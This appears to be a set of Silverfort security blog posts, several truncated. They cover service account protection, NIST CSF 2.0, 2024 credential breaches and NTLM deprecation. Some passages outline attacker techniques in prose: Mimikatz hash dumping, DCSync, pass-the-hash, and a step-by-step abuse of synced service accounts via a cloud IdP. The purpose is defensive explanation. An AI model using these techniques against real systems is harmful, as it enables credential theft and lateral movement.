2024-09-25 - Modified: 2024-09-25 - URL: https://www.silverfort.com/blog/service-account-security-why-automation-is-the-key-to-effective-enforcement/ Cybersecurity starts with one major principle: "You cannot protect what you don't know". This is true for assets like endpoints, servers, etc. , but it also applies to accounts. Ask yourself these questions right now: do you know which accounts exist in your environment, and do you know what they do in your network? On top of that, do you control what these accounts do, and how do you manage security enforcement on them? In recent posts, we've discussed the different risks that human and non-human identities (NHIs) bring to an organization. In this blog, we will focus on the challenge of scaling the management and protection of a large amount of NHIs in an environment, by leveraging automation and security policies. We’ll discover why automating service account security is essential for enterprises to enhance protection, streamline management, and reduce risk.   Protecting Non-Human Identities  When discussing accounts, it’s not just about user accounts that represent human users but also non-human identities.   User accounts are, on the face of it, easy to manage, as they belong to a real-life person that uses the account to authenticate to services and resources. Additional security layers can be added to the account, like password rotation policies, account lockout thresholds, MFA validation, etc.   A Non-Human Identity (NHI) is a general term to describe an account used by a machine, (or application, service, automation, etc. ) to perform non-interactive authentication in which no human user is involved. We refer to these as service accounts (Active Directory) or service principle (Entra ID).   Although service accounts tend to have a distinct usage pattern, limiting their security posture brings its own challenges. Every service running in the organization might need one or more service accounts, so protection needs to be at scale. Protecting service accounts boils down to a few key aspects:  Visibility: do you have a clear overview of all accounts?   Purpose: do you know why they exist in the environment?   Behavior: can you verify and validate usage?   Privileges: can you validate and guard the permissions of an account?   Attack Detection: can you protect against specific service account-based attacks?   Security management: do you have clear protection capabilities for all your accounts? A step back in time: Managed Service Accounts  Managed Service Accounts (MSAs) are specialized managed domain accounts in Active Directory designed to provide a higher level of security, such as automated password management and simplified service account management. Standalone Managed Service Accounts (sMSAs) are used for individual services on a single server and cannot be shared across multiple servers. Group Managed Service Accounts (gMSAs), on the other hand, are designed for use by multiple servers in an environment, such as when a service is provided through a load balancer. code block: example of a group-managed service account Overall, gMSAs enhance security, simplify account management, and reduce the operational complexity associated with service accounts in enterprise environments. However, not all service accounts are suitable to be MSAs, and managing MSAs can pose challenges, such as ensuring correct application configurations and understanding domain prerequisites. Many of the challenges of managing regular service accounts also apply to MSAs, including several attack techniques. So, there is room for further enhancements that identity teams and security teams could benefit from.   Challenge of Automating and Scaling Service Account Protection When embarking on the quest to have complete control over your service accounts’ activities and protection, too often and quickly a new challenge arises: how do you properly manage these accounts?   Here are the key challenges we continue to face with service account management:  Number of service accounts: the number of accounts in an organization can rise quickly, especially when it comes to service accounts. One reason for this is that every service or application running in an organization needs specific access to other resources and will use multiple service accounts to achieve this, as best practice defines. A good example of this is the number of service principals in a Microsoft Entra ID environment.   Multiple team responsibilities: most of the time, the team managing and configuring the applications is not the team in charge of the identity provider nor the security team. As a result, multiple teams like application teams, security teams, identity teams, etc. need to work together to properly secure the service accounts.   Account lifecycle: service accounts grow with the number of services, and as we mentioned above, they can be generated automatically. This makes it hard for an identity administrator to keep track of all accounts and make sure new accounts are correctly secured. Applications and services could be decommissioned and removed from the environment; however, cleaning up any related service account is often forgotten, resulting in orphaned accounts which could pose a security risk.   Visibility and documentation: service accounts are often poorly documented, which leads to a challenge when applying security policies on top. Account owners are also poorly documented and can even lead to ‘dangling owners’ when people leave the organization. To deal with the challenges of scaling service account protection, organizations need efficient and clearer management capabilities for service accounts to strengthen their security posture. Scaling Service Account Protection Policies in Silverfort  Silverfort Service Account Protection provides an overview of all your service accounts in a single place, monitors their activity in your environment and enforces protection policies. To address the challenge of scaling your service account policies, Silverfort provides several mechanisms to keep control over your service account security protection layer. In this section, we will briefly touch upon these capabilities.   Service Account Categorization  Silverfort's service account detection engine detects service accounts based on authentication behavior patterns and categorizes them into categories, including M2M (machine-to-machine) accounts, hybrid accounts, scanners and dormant. Classification is the first step towards identifying which accounts are machine-based and in use. The service account engine also detects interactive usage, new accounts, broadly used accounts, etc. All this information helps in the initial ‘triage’ of the accounts, ready to be protected by a security policy.   Silverfort leverages best practices used in an organization to manage service accounts, helping the engine in not only categorization but also detection. Implementing best practices on service account usage gives you a head start in getting your security policies in place, so it should always be top of mind when dealing with service account protection.   In nearly all environments, numerous accounts exhibit mixed behavior patterns, function in a hybrid manner, suffer from misconfigurations, or remain legacy accounts. These accounts require the attention of the identity team. Categorization is the first step in getting the focus right.   Silverfort and Managed Service Accounts  Microsoft offers MSAs to help with the management and security of service accounts. They provide automatic password management, simplified service principal name (SPN) management, and the ability to delegate management to other administrators. One of the key security measures is that they are not allowed interactive login, since they are intended for non-interactive use by services and applications. Combined with Silverfort’s service account protection policy capabilities, the security posture of gMSAs is even more enhanced while maintaining the simplicity of managing them through Active Directory.   Filtering for gMSA accounts only in the Silverfort ±service accounts screen Silverfort supports features like gMSAs under the service account protection policy. These accounts are classified as machine-to-machine, and all the capabilities available on the platform are applied to them. Each gMSA will be detected and treated the same as any service account. This means that all features including service account policies are applicable on top of gMSAs in the environment.   Smart Policies: Your Way into Automated Service Account Protection To ease the management of security policies, we recently introduced our Smart Policy capability. A Smart Policy enables you to automatically protect entire logical groupings of service accounts based on their activity profile. The Smart Policy runs in cycles, scanning service accounts for baseline changes, and defines the service account protection policy accordingly. This change is automatic and dynamic, without any need for manual intervention.   If an account behavior remains consistent for a defined period, the policy will automatically enforce a security layer on top of the account. Silverfort will protect any authentication deviating from the known baseline behavior.   With a Smart Policy, Silverfort enhances the resilience of stable and consistent service accounts, allowing you to focus on more complex and dynamic service accounts. Service account policies are automatically enforced based on your configuration settings, enhancing the security posture of your service accounts with minimal administrative effort while still maintaining a clear overview.   Integration with Service Account Policy API  A different approach for more automated and consistent service account policy management is building an automated correlation between Silverfort’s Service Account Policy and a third-party service. This can be established through Silverfort integrations; for example, by using Silverfort’s Service Account Protection app in ServiceNow (see below). Service Account Protection Policy integrations use our Service Account Policy API, which allows full control over the service account security policies. As discussed earlier, part of these security policies can be fully automated using smart policies. Others might need some additional info or instructions to be effective. From the automation perspective, this can all be read and controlled via the API. Capabilities through API are numerous. For example, you could leverage this API inside a playbook, or perform your own API interactions based on third-party events.   Integration with CMDB (Configuration Management Database) A CMDB is often used to map an organization’s complete infrastructure in one place and provide a single system of record about the environment. The CMDB consolidates and maintains a combined set of complex data coming from different sources. A single location like a CMDB, where this kind of information is live and queryable, is a very valuable asset for every department of a company.   One of the key components of a CMDB is an overview of running applications and services. This includes the software versions, hardware mapping, communication flows and ownerships. The CMDB contains a vast amount of data on what keeps a service or application running. In the context of service account protection, Silverfort is interested in the service account information related to a service or application in the CMDB. Leveraging the service account data vs application data in a CMDB allows Silverfort to enhance NHI security posture.  Not only can the CDMB act as the single point of truth, but by leveraging Silverfort’s service account detection capabilities, Silverfort is also capable of providing a validation mechanism and becoming one of the data sources for the CMDB’s data completeness and consistency. For example, this could help an organization to detect active accounts which are not documented anywhere in the CMDB.   Example: ServiceNow CMDB  Seeing the need for automated and scalable service account protection capabilities, Silverfort developed a ServiceNow application that specifically focuses on leveraging the ServiceNow CMDB data with the Silverfort Service Account Policy.   The integration delivers an automated enforcement of our Service Account Policy capabilities without any interaction of security admins. This happens in real time based on CMDB application and services data.   By using the Silverfort service account protection application on your ServiceNow CMDB instance, you enable:  Scalability: Scale service account protection by leveraging the CMDB as a single source of truth and enforce service account protection policies in real-time.   Team collaboration: leverage the integration for easy cross-team collaboration on security enforcement. Application teams updating CMDB application information can adjust the security policies for these applications without any manual intervention of security teams.   Minimizing human errors: mistakes are easily made by humans, but not by automation. Source data reflects immediately in corresponding policies with the right data in the right spot.   The integration can be installed through the ServiceNow Store here. Conclusion  Scaling Non-Human Identity protection successfully depends on the consistency and quality of service account behavior. Silverfort’s automated behavior detection, categorization and Smart Policy enforcement make the initial step towards a... --- - Published: 2024-09-18 - Modified: 2024-11-25 - URL: https://www.silverfort.com/blog/how-silverfort-can-help-organizations-align-with-nists-cybersecurity-framework-version-2-0/ Applying security controls across an organization’s environment must be a top priority for every organization, regardless of its size, sector, or maturity. To help guide organizations in managing and reducing their cybersecurity risks, the National Institute of Standards and Technology (NIST) created a security framework that provides guidelines for organizations to manage and mitigate cybersecurity risks. In this article, you will learn about the latest version of the NIST Cybersecurity Framework 2. 0 version and how Silverfort can help organizations get aligned with its identity security aspects. What is the NIST Cybersecurity Framework 2. 0 The NIST Cybersecurity Framework (CSF) 2. 0 was originally released in 2014 by the National Institute of Standards and Technology. The framework addresses a set of principles and best practices for organizations especially from the industrial and government sector. NIST 2. 0 framework consists of 6 key core functions: Identify, Protect, Detect, Respond, Recover and Govern. These core functions are essential for all organization’s approach to managing cybersecurity risks. These functions are designed to be implemented continuously and dynamically, providing a strategic view of how an organization manages its cybersecurity risks. Let’s focus on the identity security aspect of NIST CSF 2. 0. The Identity Security Aspects of the NIST CSF 2. 0 With the identity attack landscape continuously evolving, organizations have become increasingly concerned about their identity security. Through the compromise of user credentials, attackers are gaining malicious access to critical resources which allows them to conduct lateral movement and ransomware attacks. To address the importance of identity security, NIST CSF 2. 0 provides the following guidelines to organizations: Asset Management (ID. AM) Organizations must identify and manage all their assets, including data, software, hardware, systems and people, based on their importance to business objectives and risk management strategy: Organizations should manage and maintain all types of users including human, machine-to-machine and non-human identities Organizations should maintain all user authentication activity in their environment and detect who is accessing which resources as well as what authentication protocols are being used Risk Assessment (ID. RA) Organizations must understand all the cybersecurity risks that might affect its environment, including all assets and users: Organizations should identify and record all the internal and external threats as well as vulnerabilities that can be potentially exploited All the potential security risks must be prioritized including inherent risks Identity Management, Authentication, and Access Control (PR. AA) To minimize risk of unauthorized access, only identified users can get an access to physical and logical assets of the organization: Organizations should manage all the identities and credentials for authorized users, services and on-prem resources All the authentications in the organization’s environment are made by identified users and services, including service accounts Organizations should define and manage security policies for user access permissions and authorizations in accordance with the principle of the least privilege Continuous Monitoring (DE. CM) Organizations should implement continuous monitoring activities to detect anomalies and any potentially adverse events, including: User activity and authentication Access logs to resources Third-party user activities Incident Analysis (RS. AN) and Mitigation (RS. MI) To minimize the effects of the incidents and ensure effective response, organizations should investigate all the incidents and imply recovery activities: Organizations should analyze the root cause of any security incident to gain full visibility into the attack flow and its consequences Organizations should contain and eradicate all security incidents Getting NIST 2. 0 Compliant with Silverfort 1. Asset Management (ID. AM) With Silverfort you are provided with an in-depth identity inventory that displays the types of users and resources in your environment as well as weaknesses in your security. With continuous visibility and actionable insights into everything identity-related, Silverfort allows you to take a more proactive approach to your identity security posture management with just a few clicks.   2. Risk Assessment (ID. RA) Silverfort’s risk assessment provides a comprehensive overview of the of an organization’s identity security posture. It includes real-time visibility into all access attempts across your environments and runs a real-time risk analysis to calculate the risk score of each user authentication request. If any unauthorized or abnormal behavior is identified, the system can take immediate action, such as terminating the session or requesting additional authentication. The risk assessment also uncovers any security hygiene issues that can expose the environment to identity threats while detecting any active ones already underway. With this information in hand, organizations can easily identity the identity security gaps that need to be mitigated to align with NIST’s risk assessment requirements.   3. Continuous Monitoring (DE. CM) Silverfort provides centralized visibility into every authentication and access request across all users and resources in the hybrid environment, thanks to its native integrations with all identity providers. Silverfort’s analysis engine can determine the risk of every authentication, so organizations can detect and respond to any potential security threats in real time – including blocking the access of any accounts that display anomaly behavior. 4. Identity Management, Authentication, and Access Control (PR. AA) Silverfort enables organizations to enforce user access policies in real-time, so only authorized users and devices can gain access to the resources they are assigned to. By applying Silverfort access policies organizations can apply flexible policies that enforce security controls across their user base which can be defined by specific user roles, risk indicators, and organizational security policies. As a result of these policies, alerting, MFA, or blocking access to all the users who were defined in the policy can be enforced. Silverfort can block access requests for every type of user, service account, access method, and resource in real-time, effectively halting any authorized access from occurring. 5. Incident Analysis (RS. AN) and Mitigation (RS. MI) All authentication and access attempts are monitored and analyzed continuously by Silverfort, including the source, destination, risk level, and much more. In addition, you can apply access policies, either by yourself or by Silverfort, that will notify you when an access attempt deviates from normal behavior and/or deny access. Silverfort can assist you in containing, investigating, and recovering compromised accounts if you experience a security incident. Want to learn more about how Silverfort can help you address the identity security aspects of NIST CSF 2. 0? Schedule a call with one of our experts or fill out this form for a pricing quote. --- - Published: 2024-08-29 - Modified: 2024-10-09 - URL: https://www.silverfort.com/blog/keeping-up-with-the-credentials-the-evolving-landscape-of-ransomware-in-2024/ The first half of 2024 has seen some of the largest breaches in recent years. Their common denominator? Compromised credentials and lack of MFA. The most prominent breach to date is the Snowflake breach, which has continuously affected some major organizations since May. In this article, we’ll focus on some of the hardest hit organizations, and round up with a different – though just as preventable – breach. Snowflake: The Supply Chain is Only as Strong as Its Weakest Link One of the most notable breaches of 2024 so far is the breach that targeted cloud storage platform, Snowflake. In fact, the target here wasn't Snowflake itself, but rather Snowflake's customers, including AT&T, Ticketmaster, Santander Bank and Neiman Marcus, among others. As reported by several cyber news outlets, this was a textbook supply chain attack. Attackers gained access to Snowflake's customers via a compromised machine, possibly through phishing emails and malicious attachments. It is estimated that more than 500 credentials were discovered this way and put up for sale on the dark web, including usernames, passwords, and URLs of the Snowflake environments associated with those credentials. According to Wired, in some cases, the attackers used a compromised machine of a Snowflake employee or contractor as their initial point of entry. In other cases, however, the credentials used by these individuals were stolen and sold as early as 2020 and were still valid in 2024. Snowflake's Investigation Findings The investigation conducted by Snowflake and Mandiant found that at least 79. 7% of the accounts used by the attackers had been compromised years prior to the current attack and that their passwords were never changed or rotated. The investigation also confirmed that hundreds of credentials of Snowflake customers have been exposed since 2020 and that the impacted instances did not have access policies in place to only allow access from trusted locations. The investigation also found that the attackers obtained credentials and used them to access demo accounts of a former Snowflake employee. “This appears to be a targeted campaign directed at users with single-factor authentication”, confirmed Brad Jones, Snowflake's CISO, in a statement issued by Snowflake. "It did not contain sensitive data". Jones further claimed that the “access was possible because the demo account was not behind Okta or MFA”, and that “demo accounts are not connected to Snowflake’s production or corporate systems”. He also announced that Snowflake is “developing a plan to require our customers to implement advanced security controls, like MFA or network policies, especially for privileged Snowflake customer accounts. AT&T: Flake It till You Make It Approximately 110 million AT&T customers' phone numbers and call records were obtained through an AT&T Snowflake account. This information included the number of calls and texts customers made, to which destination, and the duration of each call. This means that the data also included information on non-AT&T customers who were on the other end of the call or text. The data were not leaked or made public, and according to some reports this was because AT&T allegedly paid $370,000 in ransom after negotiating with the attacker. It's been a rough year for AT&T. Only four months before the Snowflake breach, a database of more than 70 million AT&T customers was leaked online, revealing names, addresses, phone numbers, social security numbers, and birth dates. According to reports, the database was stolen in 2021 and held by the attacker mostly intact until March of this year when it was released in its entirety. Ticketmaster: Another Flake in the Blizzard In May, data on 560 million Ticketmaster users were reported to have been stolen. In July, the company sent emails to its customers notifying that an unauthorized user obtained information "from an isolated cloud database hosted by a third-party data services provider", and that the information "may have included your name, basic contact information, and payment card information such as encrypted credit or debit card numbers and expiration dates". The BBC reported that it had asked Ticketmaster why it took so long to notify its customers, but did not receive a response. Change Healthcare (UnitedHealth Group): A Lesson in Identity Hygiene In February, a ransomware attack on Change Healthcare resulted in the theft of 4TB of sensitive data of up to 1 in 3 Americans, as well as widespread outages at hospitals, pharmacies, and healthcare practices throughout the United States. Although UnitedHealth Group (UHG) paid ALPHV/Blackcat, the ransomware group who claimed responsibility for the attack, a ransom of $22 million to ensure the data would be deleted, the group allegedly passed the stolen data to another group, RansomHub, who demanded another ransom. As part of his testimony before the House Energy and Commerce Committee, UHG CEO Andrew Witty confirmed that the attackers accessed the network through a server that didn't have MFA. The attackers either purchased credentials on the dark web or used brute force to gain initial access. Either way, MFA would have stopped them. Once they gained access to the network, they moved laterally from one machine to the other – and we all know how that ended. https://www. youtube. com/watch? v=vjQAcWy1_dQ&t=912s Mitigation Best Practices There are certain precautions organizations can take to mitigate and contain such breaches, namely ITDR (Identity Threat Detection and Response) and ISPM (Identity Security Posture Management). Gady Svahjman, Global Threat Hunting Lead at Silverfort, offers some expert advice: Detection The attackers have probably used the stolen credentials in different ways to the actual legitimate user; for example, at different times, source geolocations, and source/target machines. If detections and security attributes for abnormal authentications had been implemented, the breaches could have been detected and an alert could have been triggered. Accounts that have been unused for a long period of time but whose credentials are suddenly authenticating, or accounts with passwords that do not expire should have also raised a red flag. Proper risk indicators and access policies would trigger an alert in such cases. Prevention Detection alone isn't enough, and organizations shouldn't rely exclusively on alerts. Reviewing thousands of alerts every day is not sustainable, and retrospective detection is not sufficient. Access policies could have denied access based on behavioral and pattern analysis. Lack of MFA was a crucial factor in allowing the attackers to gain access to these Snowflake instances and Change Healthcare network. By requiring more than one factor to authenticate, strong MFA controls could have stopped the attackers. Their legitimate user credentials weren't enough, as they would have had to deal with an extra layer of security. Response Raising Walls: To contain the attack and freeze the situation once it's discovered, the first security principle you should implement is creating policies to deny any access that is not necessary to critical business operations. Containing compromised accounts and machines may involve either completely denying access to machines and accounts, or only partially; for example, by allowing only specified sources and destinations access to critical infrastructure. When in doubt about whether a user account has been compromised or if the organization should allow that user to continue working, resetting that user's password and enforcing a policy to allow operations with that account using MFA is another option instead of denying access. Final Thoughts It may be uncomfortable to admit, but these breaches could have been prevented, or at least the damages kept to a minimum. All that needed to be done was to update passwords, enable MFA, and set access policies. This may sound easy enough, but it’s actually not always so straightforward. For example, organizations that contract with third parties and use accounts managed by these third parties have very limited ability to check the accounts' permissions or even whether they are still alive and active. From discovery to containment, identity security is a cycle. Coordination and unification are required, as well as a constant effort to stay on top of things. These breaches didn’t just expose credit card numbers, personal medical information and call records of millions of customers – they exposed how little we know about and are committed to identity security versus how critical it really is. --- - Published: 2024-08-15 - Modified: 2024-08-15 - URL: https://www.silverfort.com/blog/understanding-the-security-risks-of-ntlm/ In October 2023, Microsoft made a pivotal announcement that signaled the beginning of the end for NTLM, including all its versions. This decision, reiterated in June 2024, underscores Microsoft's commitment to transitioning developers to more secure protocols, such as Kerberos via the Negotiate mechanism. With the deprecation process set to commence in early 2025 and complete by 2027, NTLM's long-standing reign is ending. Despite its historical significance, NTLM now represents a considerable security liability. This blog explores the critical weaknesses inherent to NTLM, the reasons behind its prolonged use, and the imperative transition to more secure authentication protocols. Understanding these elements is essential for organizations to safeguard their systems and data in an evolving digital landscape.   Microsoft Announcement Microsoft announced in October 2023 its intention to deprecate all versions of NTLM, including LANMAN, NTLMv1, and NTLMv2. This decision was reaffirmed in June 2024, emphasizing that NTLM is no longer under active development and urging developers to transition to more secure protocols like Kerberos via the Negotiate mechanism . The deprecation process is set to begin in early 2025, with phased reductions in support throughout the year. By mid-2026, NTLM will no longer be available in new installations of Microsoft's operating systems (the possibility of enabling it in some advanced settings is unverified, however). Full deprecation, including the removal of legacy support, is expected to be complete by the end of 2027. NTLM is a Security Risk Today, NTLM poses significant security risks due to outdated cryptographic methods and well-documented weaknesses. Also, NTLM lacks modern security features such as multi-factor authentication (MFA) and server identity validation. Because of these weaknesses, attackers can exploit NTLM and gain unauthorized access to sensitive resources like databases and internal applications, making it a major liability. An older version of NTLM used a shared secret (password) to authenticate over an unencrypted channel. For a new user, there is no initialization protocol; it is as simple as "please log in user X with password Y". This means that the protocol exchanges all the information necessary for an attacker to potentially crack the password with a brute force attack within the messages themselves. To improve the shortcomings of NTLM, salting was incorporated into the challenge-response mechanism of NTLMv2. As a result, NTLMv2 can be viewed as "partially salted" or "nonce-enhanced", improving security during authentication, but not fully addressing the storage security of password hashes or reusability of hashes, as in relay attacks. Overall, NTLMv2 does not provide protection from relay attacks due to its ability to reuse hashed passwords. The Prevalence of NTLM: A Legacy's Last Stand Despite its many known vulnerabilities, NTLM has held its ground like an old warrior who refuses to retire. NTLM persistence is not random. In the late 1990s and early 2000s, a wave of legacy applications was born. These applications were often tailored to fit their organizations' unique needs. However, as time marched on, many of these applications were abandoned by their creators. They were left without updates or support, yet they remained essential to countless enterprises. NTLM, with its simple yet robust authentication mechanism, became the lifeline for these legacy systems. It provided the compatibility they needed to function in a modern world that had long moved on to newer, more secure protocols like Kerberos. For many organizations, replacing these critical systems was daunting. The migration to modern authentication protocols was not just a technical challenge but a costly and complex endeavor. This required extensive reworking of infrastructure and application code. As the enterprise landscape evolved, so did its IT infrastructure. New systems were introduced, and with them came the necessity to maintain trust relationships in a multi-domain environment. NTLM, despite its age, proved to be a reliable bridge, ensuring operational continuity and administrative convenience. Gradual upgrades became the norm, and NTLM was often kept as a fallback - a safety net for when new protocols stumbled. Yet, security analysts knew that NTLM's weaknesses made it a prime target for attackers. This was because pass-the-hash attacks, relay attacks and brute-force attempts are all too familiar in NTLM. This reliance on NTLM is a tale of survival in a rapidly changing digital world, a delicate dance between innovation and legacy. However, it is worth mentioning that NTLM is not strictly a protocol for authentication, but rather a conceptual model for designing authentication mechanisms. Its versatility allows it to integrate with various complementary protocols, such as SMB or CIFS for file sharing and RPC for RDP access, making it a robust and adaptable model for authentication. Why NTLM Still Reigns: Legacy Compatibility, Operational Necessities, and Security Considerations There are high costs and complexities associated with upgrading or rewriting legacy systems, which account for the persistence of NTLM. Furthermore, NTLM continues to be used despite the availability of more modern authentication protocols due to the gradual nature of infrastructure upgrades and the reliance on non-Windows systems and third parties. Following is a list of some of the key elements: Compatibility and legacy systems: Legacy systems and applications were designed to work with NTLM. Rewriting or upgrading these systems can be costly and complex. Some non-Windows systems and applications still rely on NTLM. Organizations often upgrade their IT infrastructure incrementally. Security Controls and Vendor Support: Certain third-party vendors may only support NTLM. Organizations enhance NTLM with security controls like MFA and monitoring. NTLM is used in specific cases such as remote access. Maintaining operational continuity often prevails over adopting new tech. Understanding Password Syncing challenges and SaaS Risks On the server side, password hashes are securely stored in the NTDS. dit file on each domain controller (DC). However, these hashes are susceptible to DCSync attacks, a sophisticated technique where malicious software masquerades as a legitimate DC. By exploiting this technique, attackers can trick the DC into syncing its database of password hashes with rogue software such as Mimikatz. This allows the attacker to harvest a complete set of credential hashes from the domain controller, which can then be used for domain takeover. Example from the Mimikatz console, executing lsadump for dcsync. The lsadump command is used to extract sensitive information such as passwords and hashes from the Local Security Authority (LSA) secrets. This is particularly dangerous for SaaS environments synchronized with on-premises Active Directory (AD) via cloud Identity Providers (IdPs) like Azure AD. Stolen hashes can be used to authenticate to SaaS applications without cracking passwords by leveraging synced AD integration. This grants unauthorized access to critical business data and services in the cloud. Attackers can move laterally within the cloud environment, compromising additional accounts and accessing sensitive information. If administrative credentials are obtained, they can trigger backdoor creation, alter security settings, and maintain persistent access. This highlights the need for MFA, continuous monitoring and adherence to the principle of least privilege. Exposing NTLM Vulnerabilities: Initial Access, Lateral Movement, and Threat Exposure This section delves into the critical phases of exposure, including how attackers often leverage NTLM weaknesses during initial access and post-exploitation stages, enabling them to establish a foothold, escalate privileges, and move laterally, thereby amplifying the potential for widespread network compromise. Initial Access: Attackers often gain initial access through methods such as phishing or exploiting software vulnerabilities. Once inside, they exploit NTLM vulnerabilities to establish network foothold. Post-Exploitation Exposure: Post-exploitation, NTLM vulnerabilities allow attackers to maintain and expand their access. This could involve further escalating privileges and moving laterally within the network, increasing damage. Malicious Access: Lateral Movement Lateral Movement: With NTLM, you can reuse or replay the hash on other, more privileged machines until you gain domain dominance. Out of the (hacker) box, Kali Linux, onboarded with Metasploit exploits, can be used to accomplish this. For instance, in the Target data breach of 2013, attackers used stolen credentials to move laterally within the network, accessing sensitive systems and customer data. This breach exposed millions of credit card and personal information records, highlighting the dangers of pass-the-hash attacks. Attackers used captured NTLM hashes to authenticate and move across systems within the network, evading detection and accessing sensitive resources. Another example is the infamous WannaCry ransomware attack. Attackers used a known vulnerability in the SMB protocol to spread the malware. This included exploiting NTLM authentication weaknesses to move laterally across affected networks. This allowed them to rapidly propagate the ransomware, causing widespread disruption. Image: Screenshot of Metasploit running on Kali Linux, showcasing version 4. 17. 3-dev with details of available exploits, auxiliary, and post-exploitation modules NTLM Threat Exposure Unveiled The next section delves into the threat exposure posed by NTLM, highlighting how attackers can exploit stored and transmitted hashes, leading to significant security breaches across networks. NTLM Hashes Stored in Memory The vulnerabilities of NTLM are particularly evident in how it handles and transmits hashes, making it a prime target for attackers seeking to compromise network security through memory extraction, network interception, and pass-the-hash attacks. NTLM hashes are stored in the memory of authenticated machines. Attackers can use tools like Mimikatz to extract these hashes from machine memory, allowing them to impersonate users without needing their actual passwords. Once attackers have extracted the NTLM hashes, they can perform a pass-the-hash attack. This involves using the hash to authenticate against other systems in the network, effectively granting them the same access as the original user. This can lead to a large-scale compromise of the network if higher-privileged accounts are targeted. NTLM Hashes Sent Over the Network NTLM authentication sends hashes over the network, making them susceptible to interception. By using network sniffing tools, attackers can capture these hashes and perform man-in-the-middle attacks to gain access to them. If attackers successfully intercept these hashes, they can use them to escalate their privileges by authenticating to additional machines and using tools like LSADUMP to extract further credentials. NTLS has Multiple Authentications Compared to Kerberos NTLM Authentication: Each time a user accesses a different resource, NTLM sends the hashed credentials over the network. This repeated transmission of hashes provides more opportunities for attackers to intercept and misuse them. As hashes are stored on each machine, they are dispersed throughout the network by design. Imagine a user named Alice who needs to access multiple network resources such as a file server, an email server, and a printer. For each access request, Alice's workstation sends her hashed credentials over the network to the respective server. An attacker using a network sniffing tool can intercept these hashes during transmission. With enough intercepted hashes, the attacker can perform a pass-the-hash attack to gain unauthorized access to other systems by replaying the captured hashes. Kerberos Authentication: Kerberos, in contrast, uses a ticket-based authentication mechanism that minimizes repeated authentication requests and significantly reduces credential interception risk. In Kerberos, the user authenticates once to the Key Distribution Center (KDC) and receives a Ticket Granting Ticket (TGT). This TGT is then used to request service tickets for accessing different resources without resending the user's credentials over the network. Combating NTLM Attacks: Common Strategies and Proactive Measures The purpose of the following section is to examine techniques that relate to credential access, beginning with dumping the hashes stored in memory. When a user logs in or authenticates with a service, their credentials are hashed, and these hashes are stored in the system's memory. Attackers frequently use tools like Mimikatz to extract NTLM hashes from a machine's memory. Once obtained, these hashes can be leveraged in pass-the-hash attacks to gain unauthorized access to other systems within the network. Attackers typically begin by compromising a system with sufficient privileges to access the Local Security Authority Subsystem Service (LSASS) memory, where NTLM hashes are stored. Example of extracted NTLM and SHA1 hashes using Mimikatz. The image displays information about an interactive user session, including the authentication details for a user named "alice" on the CONTOSO domain. It shows her NTLM and SHA1 hashes, which could potentially be used in a relay attack or password cracking attempt. From Network Traffic: Responder In a network where NTLM authentication is used, tools like Responder pose a significant threat because they can capture... --- - Published: 2024-08-01 - Modified: 2024-09-30 - URL: https://www.silverfort.com/blog/shining-the-spotlight-on-the-rising-risks-of-non-human-identities/ Active Directory Service Accounts: A closer look at one of the most common NHIs and their role in lateral movement The security of Non-Human Identities (NHIs) is now top of mind for security stakeholders. But what exactly is a non-human identity, and how do they impact an organization’s cybersecurity posture? NHI is a broad term used to describe when a machine, application, or service is given credentials to perform an automated task or action. There are many types of NHIs, including API keys, service accounts, system accounts, OAuth tokens, amongst others. Let’s say IT manager Bob writes a script asking a machine to perform a daily backup to a server. Bob is giving the machine credentials and access to perform the automated backup. This is an NHI. In today’s research, we’re going to zero in on the most prevalent and regularly compromised type of NHI: Active Directory service accounts. Within the large pool of NHI types, service accounts — used for machine-to-machine communication within Microsoft’s Active Directory’s (AD) environments — are the most concerning. These identities are just as vulnerable to potential compromise and abuse than human ones. In fact, due to historic lack of visibility and protection, they might even be at graver risk. Typically, they have privileged access to sensitive machines, effectively making them admin accounts. We’ve uncovered data from the past 12 months that helps us answer those questions. In our research, we unpack the scope of AD service accounts, their compromise exposure, and the confidence of identity security teams in their ability to discover and protect them. Why NHIs — AD Service Accounts — are an Attacker’s Best Friend By default, attackers will target service accounts for lateral movement due to their high-access privileges, low visibility, and protection challenges. And, in many cases, service accounts fly under the radar of security and identity teams because they don’t even know they exist. Using the same example as above, when IT manager Bob automates the backup of a server but then leaves the company, that automated machine-to-machine task continues unseen and unmonitored. The service account still has access to both the server and the backup server, making it an enticing target for a bad actor. The risks associated with a breached service account are immense because it can lead to the compromise of the organization’s entire SaaS environment, too. Even though service accounts are not supposed to be synced from AD to the cloud identity provider (IdP), it’s extremely common for identity teams to sync them inadvertently. While these accounts can’t be used to access SaaS resources by default, an attacker that has gained admin access privileges to the cloud IdP can activate them and assign them access privileges. Sample attack flow: Attacker gains admin access privileges to the cloud IdP management console. Once inside, the attacker searches for synced service accounts (naming conventions are a useful guide) until finding one. Attacker configures an access policy for the chosen service account and assigns it access privileges to SaaS apps. Attacker then uses the service account to access and act within the SaaS environment. The Sheer Volume of AD Service Accounts Is Alarming Service accounts make up a large portion of total users within a company’s AD On average, around one-third of users within AD are service accounts. The ratio of service accounts to total identities in larger companies is smaller, but that doesn’t mean they have fewer service accounts when it comes to absolute value. To put this into context, a large enterprise with 100,000 users in AD would likely have approximately 23,000 active service accounts. In smaller organizations, nearly half of all AD users are service accounts with high privileges and access. Service Accounts’ Exposure to Compromise Weak authentication protocols make service accounts vulnerable NTLM still exists in many Windows domains despite being a very weak authentication protocol that’s susceptible to credential access and lateral movement. In fact, 46% of service accounts regularly authenticate via this deprecated protocol, leaving them more exposed to compromise.   Visibility into Service Accounts is Murky at Best Teams aren’t so sure they have an accurate inventory of service accounts Complete visibility into all your human and non-human identities is fundamental to good identity security. Yet a recent whitepaper by Osterman Research revealed that only 5. 7% of organizations have full visibility into their service accounts, while 62% only have partial visibility.   Most NHIs, including service accounts, cannot be protected with MFA, and the lack of visibility into their activities eliminates the possibility of protecting them in a Privileged Access Management (PAM) vault with password rotation. Confidence in Protecting Service Accounts is Minimal Protection of service accounts is a serious challenge for organizations Only 1 in 5 organizations are highly confident that they can prevent adversaries from using a service account for malicious access. This leaves 80% of organizations unable to prevent the misuse of service accounts in real time due to sporadic or absent visibility and security.   Lateral movement continues to be a thorn in the defender’s side Moving laterally through an organization is table stakes for an attacker, and service accounts are one of their top targets to do so. Alarmingly, only 22. 4% of organizations are confident they can stop lateral movement with compromised credentials in their environments. Looking Ahead: NHIs Present a Challenge, But There Are Solutions  NHIs make up a significant portion of an organization’s total identities. The volume of NHIs will continue to climb as we accelerate the pace of automation, innovation, and the great amplifier — artificial intelligence. Today, we analyzed a single type of NHI used at the typical organization, but it’s not hard to imagine a slew of 